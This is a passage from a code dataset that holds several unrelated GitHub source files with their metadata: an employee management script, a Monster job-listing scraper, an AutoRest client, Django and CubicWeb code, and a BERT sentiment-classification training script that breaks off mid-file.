input(\"Enter employee id to search report\")\n        s_m = int(search_employee)\n\n        for j in lst:\n            if j.employee_id == s_m:\n                print(\"--------------------------------------------\")\n                print(\"           Manager Remarks on Report\")\n                print(\"--------------------------------------------\")\n                print(\"Employee ID = \", j.employee_id)\n                print(\"Employee Name = \", j.Name)\n                print(\"Employee Designation = \", j.Roll)\n                print(\"Employee Report = \", j.Report)\n                print(\"Manager Remarks = \", j.Manager_Remarks)\n\n                print(\"--------------------------------------------\")\n                break\n\n        else:\n            print(\"employee does not exist\")\n\n\n\n\nEmployee_List = 
[]\n\n\ndef add_employee():\n    print(\"--------------------------------------------\")\n    print(\"           Create new employee\")\n    print(\"--------------------------------------------\")\n    name = input(\"Enter Name :\")\n\n    roll = designation()\n    dat = datetime.datetime.now()\n    print(dat.year, \"/\", dat.day, \"/\", dat.strftime(\"%A\"))\n\n    print(dat)\n    print(dat.month)\n\n    experience = 0\n    salary = input_number(\"Enter your salary\")\n    print(\"--------------------------------------------\")\n    return name, roll, experience, salary\n\n\ndef add_new_employee():\n    name, roll, experience, salary = add_employee()\n    employee = Employee(name, roll, salary, experience)\n    employee.set_id(Employee.e_id + 1)\n    Employee.e_id = Employee.e_id + 1\n    Employee_List.append(employee)\n\n\n#Employee_obj = Employee(1, \"Arslan\", \"PM\", 500, 1, \"none\")\n#Employee_List.append(Employee_obj)\ni = 1\nwhile i > 0:\n    print(\"Enter Your Desired Value for Search\\n 1 - Add New Employee\\n 2 - Search All Employees\")\n    print(\" 3 - Search Report ( Only for manager )\\n 4 - Enter Report\\n 5 - Search Manager Remarks on Report\")\n    search_value = int(input(\"Enter here : \"))\n    if search_value == 1:\n        add_new_employee()\n    elif search_value == 2:\n        Obj = EmployeeManager()\n        Obj.showemployees(Employee_List)\n        print(\"thank you\")\n    elif search_value == 3:\n        Obj = EmployeeManager()\n        Obj.show_report(Employee_List)\n    elif search_value == 4:\n        print(\"working on it...\")\n        obj = EmployeeGeneral()\n        obj.create_report(Employee_List)\n    elif search_value == 5:\n        obj = EmployeeGeneral()\n        obj.manager_remarks(Employee_List)\n\n    else:\n        print(\"you have chosen a wrong value\")\n    choice = int(input(\"Enter 1 - If you want to go to main menu\"))\n    if choice != 1:\n        print(\"End program\")\n        break", "repo_name": "arslan-asghar/Employee-Management-System", "sub_path": "EMS.py", "file_name": "EMS.py", "file_ext": "py", "file_size_in_byte": 6430, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "attribute"}]} +{"seq_id": "13326043488", "text": "import os\nimport pandas as pd\nfrom scrapfly import ScrapflyClient, ScrapeConfig\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm \nimport re\nimport requests\nimport json\nfrom datetime import date\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nSCRAPFLY_API_KEY = os.getenv(\"SCRAPFLY_API_KEY\")\n\ndef scrapfly_request(link):\n    \n    scrapfly = ScrapflyClient(key=SCRAPFLY_API_KEY)\n    result = scrapfly.scrape(ScrapeConfig(\n        url = link,\n        country = \"gb\",\n        ))\n    \n    return result.content\n\ndef get_apikey_fingerprint(link):\n    content = scrapfly_request(link)\n    soup = BeautifulSoup(content,features=\"lxml\")\n    \n    data = str(soup)\n    pattern = r'\"key\":\"([^\"]+)\"'\n\n    match = re.search(pattern, data)\n\n    if match:\n        key_value_pair = match.group(1)\n        \n    pattern = r'fingerprint\":\"([^\"]+)\"'\n\n    match = re.search(pattern, data)\n\n    if match:\n        fingerprint_value = match.group(1)\n        \n    return fingerprint_value,key_value_pair\n\ndef get_searchId(fingerprint_value,key_value_pair,offset,query):\n    url = f\"https://appsapi.monster.io/jobs-svx-service/v2/monster/search-jobs/samsearch/en-GB?apikey={key_value_pair}\"\n    \n    payload = 
'''{\"jobQuery\":{\n\"query\":\"'''+str(query)+'''\",\"locations\":[{\"country\":\"gb\",\"address\":\"\",\"radius\":{\"unit\":\"mi\",\"value\":20}}],\"activationRecency\":\"today\"},\"jobAdsRequest\":{\"position\":[1,2,3,4,5,6,7,8,9],\"placement\":{\"channel\":\"WEB\",\"location\":\"JobSearchPage\",\"property\":\"monster.co.uk\",\"type\":\"JOB_SEARCH\",\"view\":\"SPLIT\"}},\n \"fingerprintId\":\"'''+str(fingerprint_value)+'''\",\"offset\":\"'''+str(offset)+'''\",\"pageSize\":9,\"histogramQueries\":[\"count(company_display_name)\",\"count(employment_type)\"],\"includeJobs\":[]}'''\n\n \n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'content-type': 'application/json; charset=UTF-8'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n return json.loads(response.text)\n\ndef scrap_job_data(fingerprint_value,key_value_pair,offset,searchId,location):\n url = f\"https://appsapi.monster.io/jobs-svx-service/v2/monster/search-jobs/samsearch/en-GB?apikey={key_value_pair}\"\n\n payload = '{\\\"jobQuery\\\":{\\\"query\\\":\\\"\\\",\\\"locations\\\":[{\\\"country\\\":\\\"gb\\\",\\\"address\\\":\\\"Bedfordshire\\\",\\\"radius\\\":{\\\"unit\\\":\\\"mi\\\",\\\"value\\\":5}}],\\\"activationRecency\\\":\\\"today\\\"},\\\"jobAdsRequest\\\":{\\\"position\\\":[1,2,3,4,5,6,7,8,9],\\\"placement\\\":{\\\"channel\\\":\\\"WEB\\\",\\\"location\\\":\\\"JobSearchPage\\\",\\\"property\\\":\\\"monster.co.uk\\\",\\\"type\\\":\\\"JOB_SEARCH\\\",\\\"view\\\":\\\"SPLIT\\\"}},\\\"fingerprintId\\\":\\\"z50446280c2b01c552e1556a3d58d1e28\\\",\\\"offset\\\":9,\\\"pageSize\\\":9,\\\"histogramQueries\\\":[\\\"count(company_display_name)\\\",\\\"count(employment_type)\\\"],\\\"searchId\\\":}'\n\n payload = re.sub(r'\"fingerprintId\":\"[^\"]+\"', f'\"fingerprintId\":\"{fingerprint_value}\"', payload)\n payload = re.sub(r'\"offset\":\\d+', f'\"offset\":{offset}', payload)\n payload = re.sub(r'\"searchId\":', f'\"searchId\":\"{searchId}\"', payload)\n payload = re.sub(r'\"address\":\"([^\"]+)\"', f'\"address\":\"{location}\"', payload)\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',\n 'content-type': 'application/json; charset=UTF-8'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n return json.loads(response.text)\n\ndef monster_scrap(monster_link):\n if not os.path.exists(\"output/monster/data_by_location\"):\n os.makedirs(\"output/monster/data_by_location\")\n if not os.path.exists(\"output/monster/full_data\"):\n os.makedirs(\"output/monster/full_data\")\n pages_data = []\n job_data = []\n offset = 0 \n fingerprint_value,key_value_pair = get_apikey_fingerprint(monster_link['links']) \n for i in tqdm(range(0,1000)):\n # try:\n data = get_searchId(fingerprint_value,key_value_pair,offset,monster_link['locations'])\n if 'message' in data.keys():\n break\n if data['totalSize']==0:\n break\n offset+=9\n pages_data.append(data)\n # except:\n # pass\n for jobs in pages_data:\n for job in jobs['jobResults']:\n try:\n title = job['jobPosting']['title']\n posted = job['jobPosting']['datePosted']\n location = job['jobPosting']['jobLocation'][0]['address']['addressLocality']+','+job['jobPosting']['jobLocation'][0]['address']['addressRegion']\n company = job['jobPosting']['hiringOrganization']['name']\n url = job['jobPosting']['url']\n job_data.append({'posted':posted,'job 
title':title,'company working':company,'location working':location,'link':url}) \n except:\n pass\n df = pd.DataFrame(job_data)\n df = df.drop_duplicates()\n\n df.to_csv(f'output/monster/data_by_location/monster_output_{monster_link[\"locations\"]}_{date.today()}.csv',index=False)\n\ndef merge_data():\n folder_path = 'output/monster/data_by_location'\n\n csv_files = [file for file in os.listdir(folder_path) if file.endswith(f'_{date.today()}.csv')]\n\n new_folder_path = 'output\\\\monster\\\\full_data'\n\n if len(csv_files) == 0:\n print(\"No CSV files found in the folder.\")\n dataframes = []\n\n for file in csv_files:\n try:\n file_path = os.path.join(folder_path, file)\n df = pd.read_csv(file_path)\n dataframes.append(df)\n\n merged_data = pd.concat(dataframes, ignore_index=True)\n merged_file_path = os.path.join(new_folder_path, f'monster_full_data_{date.today()}.csv')\n merged_data.to_csv(merged_file_path, index=False)\n except:\n pass\n\n", "repo_name": "zakaria47fs/jobs-scrapers", "sub_path": "utils/utils_monster.py", "file_name": "utils_monster.py", "file_ext": "py", "file_size_in_byte": 5812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "scrapfly.ScrapflyClient", "line_number": 18, "usage_type": "call"}, {"api_name": "scrapfly.scrape", "line_number": 19, "usage_type": "call"}, {"api_name": "scrapfly.ScrapeConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 33, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 60, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 70, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 71, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 72, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 78, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 86, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 116, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 121, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, 
{"api_name": "pandas.concat", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 136, "usage_type": "name"}]} +{"seq_id": "73182539364", "text": "from typing import TYPE_CHECKING\n\nfrom azure.core import PipelineClient\nfrom msrest import Deserializer, Serializer\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Optional\n\nfrom ._configuration import AutoRestRequiredOptionalTestServiceConfiguration\nfrom .operations import ImplicitOperations\nfrom .operations import ExplicitOperations\nfrom . import models\n\n\nclass AutoRestRequiredOptionalTestService(object):\n \"\"\"Test Infrastructure for AutoRest.\n\n :ivar implicit: ImplicitOperations operations\n :vartype implicit: requiredoptional.operations.ImplicitOperations\n :ivar explicit: ExplicitOperations operations\n :vartype explicit: requiredoptional.operations.ExplicitOperations\n :param required_global_path: number of items to skip.\n :type required_global_path: str\n :param required_global_query: number of items to skip.\n :type required_global_query: str\n :param optional_global_query: number of items to skip.\n :type optional_global_query: int\n :param str base_url: Service URL\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n \"\"\"\n\n def __init__(\n self,\n required_global_path, # type: str\n required_global_query, # type: str\n optional_global_query=None, # type: Optional[int]\n base_url=None, # type: Optional[str]\n **kwargs # type: Any\n ):\n # type: (...) 
-> None\n if not base_url:\n base_url = 'http://localhost:3000'\n self._config = AutoRestRequiredOptionalTestServiceConfiguration(required_global_path, required_global_query, optional_global_query, **kwargs)\n self._client = PipelineClient(base_url=base_url, config=self._config, **kwargs)\n\n client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}\n self._serialize = Serializer(client_models)\n self._deserialize = Deserializer(client_models)\n\n self.implicit = ImplicitOperations(\n self._client, self._config, self._serialize, self._deserialize)\n self.explicit = ExplicitOperations(\n self._client, self._config, self._serialize, self._deserialize)\n\n def close(self):\n # type: () -> None\n self._client.close()\n\n def __enter__(self):\n # type: () -> AutoRestRequiredOptionalTestService\n self._client.__enter__()\n return self\n\n def __exit__(self, *exc_details):\n # type: (Any) -> None\n self._client.__exit__(*exc_details)\n", "repo_name": "Azure/autorest.azure-functions-python", "sub_path": "test/vanilla/Expected/AcceptanceTests/RequiredOptional/requiredoptional/_auto_rest_required_optional_test_service.py", "file_name": "_auto_rest_required_optional_test_service.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 6, "usage_type": "name"}, {"api_name": "_configuration.AutoRestRequiredOptionalTestServiceConfiguration", "line_number": 44, "usage_type": "call"}, {"api_name": "azure.core.PipelineClient", "line_number": 45, "usage_type": "call"}, {"api_name": "msrest.Serializer", "line_number": 48, "usage_type": "call"}, {"api_name": "msrest.Deserializer", "line_number": 49, "usage_type": "call"}, {"api_name": "operations.ImplicitOperations", "line_number": 51, "usage_type": "call"}, {"api_name": "operations.ExplicitOperations", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "37790105831", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('zoho_integration', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contact',\n name='membership_status',\n field=models.CharField(max_length=300, choices=[('Full', 'Full Membership'), ('Starving', 'Starving Hacker')]),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contactchange',\n name='new_value',\n field=models.CharField(max_length=300, null=True, default='None'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contactchange',\n name='old_value',\n field=models.CharField(max_length=300, null=True, default='None'),\n preserve_default=True,\n ),\n ]\n", "repo_name": "dkoppel/ps1auth-1", "sub_path": "zoho_integration/migrations/0002_auto_20150216_2026.py", "file_name": "0002_auto_20150216_2026.py", "file_ext": "py", "file_size_in_byte": 972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "74783460005", "text": "from datetime import timedelta, datetime\n\nfrom cubicweb.server import hook\n\nclass TransactionsCleanupStartupHook(hook.Hook):\n \"\"\"start task to cleanup transaction data\"\"\"\n __regid__ = 'cw.looping-tasks.transactions-cleanup'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n # XXX use named args and inner functions to avoid referencing globals\n # which may cause reloading pb\n lifetime = timedelta(days=self.repo.config['keep-transaction-lifetime'])\n def cleanup_old_transactions(repo=self.repo, lifetime=lifetime):\n mindate = datetime.utcnow() - lifetime\n with repo.internal_cnx() as cnx:\n cnx.system_sql(\n 'DELETE FROM transactions WHERE tx_time < %(time)s',\n {'time': mindate})\n cnx.commit()\n if self.repo.config['undo-enabled']:\n self.repo.looping_task(60*60*24, cleanup_old_transactions,\n self.repo)\n\nclass UpdateFeedsStartupHook(hook.Hook):\n \"\"\"start task to update datafeed based sources\"\"\"\n __regid__ = 'cw.looping-tasks.update-feeds'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n def update_feeds(repo):\n # take a list to avoid iterating on a dictionary whose size may\n # change\n for uri, source in repo.sources_by_uri.items():\n if (uri == 'system'\n or not repo.config.source_enabled(source)\n or not source.config['synchronize']):\n continue\n with repo.internal_cnx() as cnx:\n try:\n source.pull_data(cnx)\n except Exception as exc:\n cnx.exception('while trying to update feed %s', source)\n self.repo.looping_task(60, update_feeds, self.repo)\n\n\nclass DataImportsCleanupStartupHook(hook.Hook):\n \"\"\"start task to cleanup old data imports (ie datafeed import logs)\"\"\"\n __regid__ = 'cw.looping-tasks.dataimports-cleanup'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n def expire_dataimports(repo=self.repo):\n for uri, source in repo.sources_by_uri.items():\n if (uri == 'system'\n or not repo.config.source_enabled(source)):\n continue\n with repo.internal_cnx() as cnx:\n mindate = datetime.utcnow() - timedelta(seconds=source.config['logs-lifetime'])\n cnx.execute('DELETE CWDataImport X WHERE X start_timestamp < %(time)s',\n {'time': mindate})\n cnx.commit()\n self.repo.looping_task(60*60*24, expire_dataimports, self.repo)\n", "repo_name": "gurneyalex/cubicweb", "sub_path": "cubicweb/hooks/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cubicweb.server.hook.Hook", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", 
"line_number": 5, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "cubicweb.server.hook.Hook", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", "line_number": 27, "usage_type": "name"}, {"api_name": "cubicweb.server.hook.Hook", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", "line_number": 51, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "11587899991", "text": "from django.urls import path,include\n\nfrom .views import *\n\n\nurlpatterns=[\n #add Urls Actions\n path('add_student/', add_student.as_view(), name='add_student'),\n path('add_teacher/', add_teacher.as_view(), name='add_teacher'),\n path('add_course/', add_course.as_view(), name='add_course'),\n \n #List Urls Actions\n path('list_students/',student_list.as_view(),name=\"students_people\"),\n path('list_courses/',course_list.as_view(),name=\"courses_people\"),\n path('list_teachers/',teacher_list.as_view(),name=\"teachers_people\"),\n \n #Update Urls Actions\n path('update_course//', update_course.as_view(), name='update_course'),\n \n #Delete Urls Actions\n path('delete_student//', delete_student.as_view()),\n path('delete_teacher//', delete_teacher.as_view(), name=\"delete_teacher\"),\n path('delete_course//', delete_course.as_view()),\n \n #Login \n path('user-login/', UserLoginAPIView.as_view(), name='user_login_api'),\n path('student-login/', StudentLoginView.as_view(), name='student_login_api'),\n path('teacher-login/', TeacherLoginView.as_view(), name='teacher_login_api'),\n \n #Relations\n path('profesores//estudiantes/', TeacherStudent.as_view(), name='profesor-estudiantes'),\n\n #Get relations\n #path('teacher-student//', TeacherStudent.as_view(),name=\"teacher_student\"),\n path('estudiantes//cursos/', CursosEstudianteView.as_view(), name='cursos_estudiante'), \n path('agregar_curso_profesor_a_estudiante/', agregar_curso_profesor_a_estudiante, name='agregar_curso_profesor_a_estudiante'),\n\n path('agregar_curso_profesor/', agregar_curso_profesor, name='agregar_curso_profesor_a_estudiante'),\n path('profesor//cursos/', ProfesorCursosView.as_view(), name='cursos_profesores'), \n path('profesores//estudiantes/', ProfesorEstudiantes.as_view(), name='estudiantes_profesores'), \n \n #Account settings app\n path('',include('apps.account_settings.urls')),\n]", "repo_name": "Trycatch-tv/team-8-backend", "sub_path": "apps/administration_sc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2199, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", 
"line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "73810327844", "text": "import re\nimport random\nimport time\nimport datetime\n\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom scipy import stats\nfrom transformers import BertTokenizer\nfrom transformers import BertForSequenceClassification, AdamW, BertConfig\nfrom transformers import get_linear_schedule_with_warmup\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.datasets import imdb\nfrom sklearn.model_selection import train_test_split\n\ndef separator(text):\n return re.sub(pattern=\"|\\.|\\?|\\!\", string=text, repl=\" [SEP] \")\n\ndf = pd.read_csv('imdbdata.csv', header=0)\ndf.head(5)\ntexts = df.review\nclasses = df.sentiment\nclasses_oh = df.sentiment.apply(lambda x: 1 if x == 'positive' else 0)\nclasses_oh = classes_oh.values\n\ndef bert_tokenize(texts):\n return [tokenizer.tokenize(\"[CLS] \" + text + \" [SEP]\") for text in texts]\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\ntokenized = bert_tokenize(texts)\nbert_ids = [tokenizer.convert_tokens_to_ids(tokens) for tokens in tokenized]\n\nnumber_of_tokens = np.array([len(bert_id) for bert_id in bert_ids])\nstats.describe(number_of_tokens)\n\nMAX_LEN = 512\npadded_bert_ids = pad_sequences(bert_ids, maxlen=MAX_LEN, dtype='long',\n\t\t\t\t\t\t\t\t\ttruncating='post', padding='post')\npadded_bert_ids[0]\n\nattention_masks = [] # \nfor seq in padded_bert_ids: # \n seq_mask = [float(i>0) for i in seq]\n attention_masks.append(seq_mask)\n\nX_train, X_test, y_train, y_test = \\\ntrain_test_split(padded_bert_ids, classes_oh, random_state=42, test_size=0.3)\n\nmasks_train, masks_test, _, _ = train_test_split(attention_masks, padded_bert_ids, \n random_state=42, test_size=0.3)\n\nX_train, X_val, y_train, y_val = \\\ntrain_test_split(X_train, y_train, random_state=42, test_size=0.1)\n\nmasks_train, masks_val, _, _ = train_test_split(masks_train, masks_train, \n random_state=42, test_size=0.1)\n\n\n\n\n# display(\n# f\"X_train: {X_train.shape}\",\n# f\"X_val: {X_val.shape}\",\n# f\"X_test: {X_test.shape}\",\n# f\"y_train: {y_train.shape}\",\n# f\"y_val: {y_val.shape}\",\n# f\"y_test: {y_test.shape}\",\n# f\"masks_train: {len(masks_train)}\",\n# f\"masks_val: {len(masks_val)}\",\n# f\"masks_test: {len(masks_test)}\",\n# )\n\ntrain_inputs = 
torch.tensor(X_train)\ntrain_labels = torch.tensor(y_train)\ntrain_masks = torch.tensor(masks_train)\nvalidation_inputs = torch.tensor(X_val)\nvalidation_labels = torch.tensor(y_val)\nvalidation_masks = torch.tensor(masks_val)\n\ntest_inputs = torch.tensor(X_test)\ntest_labels = torch.tensor(y_test)\ntest_masks = torch.tensor(masks_test)\n\nprint(train_inputs.shape)\nprint(train_labels.shape)\nprint(train_masks.shape)\nprint(validation_inputs.shape)\nprint(validation_labels.shape)\nprint(validation_masks.shape)\nprint(test_inputs.shape)\nprint(test_labels.shape)\nprint(test_masks.shape)\n\nBATCH_SIZE = 4\n\ntrain_data = TensorDataset(train_inputs, train_masks, train_labels)\ntrain_sampler = RandomSampler(train_data)\ntrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\nvalidation_data = TensorDataset(validation_inputs, validation_masks, validation_labels)\nvalidation_sampler = SequentialSampler(validation_data)\nvalidation_dataloader = DataLoader(validation_data, sampler=validation_sampler, batch_size=BATCH_SIZE)\n\ntest_data = TensorDataset(test_inputs, test_masks, test_labels)\ntest_sampler = RandomSampler(test_data)\ntest_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=BATCH_SIZE)\n\ndevice = torch.device(\"cuda:0\")\n\nmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\", num_labels=2)\n\noptimizer = AdamW(model.parameters(),\n lr = 2e-5, # learning rate\n eps = 1e-8 # epsilon value to prevent division by zero\n )\n\nepochs = 4\ntotal_steps = len(train_dataloader) * epochs\n\nscheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 0,\n num_training_steps = total_steps)\n\n# accuracy calculation function\ndef flat_accuracy(preds, labels):\n \n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\n# time formatting function\ndef format_time(elapsed):\n\n # round to the nearest second\n elapsed_rounded = int(round((elapsed)))\n \n # change format to hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n \n\n# fix random seed for reproducibility\nseed_val = 42\nrandom.seed(seed_val)\nnp.random.seed(seed_val)\ntorch.manual_seed(seed_val)\ntorch.cuda.manual_seed_all(seed_val)\n\n# reset gradients\nmodel.zero_grad()\n\n# repeat for each epoch\nfor epoch_i in range(0, epochs):\n \n # ========================================\n # Training\n # ========================================\n \n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # set start time\n t0 = time.time()\n\n # reset loss\n total_loss = 0\n\n # switch to training mode\n model.train()\n \n # fetch batches from the dataloader\n for step, batch in enumerate(train_dataloader):\n # show progress information\n if step % 500 == 0 and not step == 0:\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\n\n # move the batch to the GPU\n batch = tuple(t.to(device) for t in batch)\n \n # unpack the data from the batch\n b_input_ids, b_input_mask, b_labels = batch\n\n # perform forward pass \n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask, \n labels=b_labels)\n \n # get the loss\n loss = outputs[0]\n\n # accumulate the total loss\n total_loss += loss.item()\n\n # compute gradients via backward pass\n loss.backward()\n\n # gradient clipping\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n\n # update weight parameters using the gradients\n optimizer.step()\n\n # decay the learning rate with the scheduler\n scheduler.step()\n\n # reset gradients\n model.zero_grad()\n\n # compute average loss\n avg_train_loss = total_loss / len(train_dataloader) \n\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epoch took: {:}\".format(format_time(time.time() - t0)))\n \n # ========================================\n # Validation\n # ========================================\n\n print(\"\")\n print(\"Running Validation...\")\n\n # set start time\n t0 = time.time()\n\n # switch to evaluation mode\n model.eval()\n\n # initialize variables\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n\n # fetch batches from the dataloader\n for batch in validation_dataloader:\n # move the batch to the GPU\n batch = tuple(t.to(device) for t in batch)\n \n # unpack the data from the batch\n b_input_ids, b_input_mask, b_labels = batch\n \n # do not compute gradients\n with torch.no_grad(): \n # perform forward pass\n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # get the logits\n logits = outputs[0]\n\n # move data 